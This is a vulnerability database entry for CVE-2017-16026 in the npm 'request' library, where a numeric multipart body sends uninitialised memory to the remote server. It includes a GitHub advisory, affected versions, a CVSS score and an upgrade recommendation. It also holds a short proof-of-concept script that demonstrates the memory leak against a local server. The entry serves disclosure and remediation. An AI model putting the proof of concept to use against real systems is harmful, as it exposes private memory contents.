CVE-2017-16026
UNKNOWN
Published 2018-06-04T19:00:00Z
Actions:
Expert Analysis
Professional remediation guidance
Get tailored security recommendations from our analyst team for CVE-2017-16026. We'll provide specific mitigation strategies based on your environment and risk profile.
No CVSS data available
Description
Request is an http client. If a request is made using ```multipart```, and the body type is a ```number```, then the specified number of non-zero memory is passed in the body. This affects Request >=2.2.6 <2.47.0 || >2.51.0 <=2.67.0.
Available Exploits
No exploits available for this CVE.
Related News
No news articles found for this CVE.
Affected Products
Affected Versions:
GitHub Security Advisories
Community-driven vulnerability intelligence from GitHub
Advisory Details
Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.
## Proof of Concept
```js
var request = require('request');
var http = require('http');
var serveFunction = function (req, res){
req.on('data', function (data) {
console.log(data)
});
res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);
request({
method: "POST",
uri: 'http://localhost:8000',
multipart: [{body:500}]
},function(err,res,body){});
```
## Recommendation
Update to version 2.68.0 or later
Affected Packages
npm
request
ECOSYSTEM:
≥2.49.0
<2.68.0
npm
request
ECOSYSTEM:
≥2.2.6
<2.68.0
CVSS Scoring
CVSS Score
5.0
CVSS Vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
References
Advisory provided by GitHub Security Advisory Database. Published: November 9, 2018, Modified: September 12, 2023
References
Published: 2018-06-04T19:00:00Z
Last Modified: 2024-09-16T17:28:08.484Z
Copied to clipboard!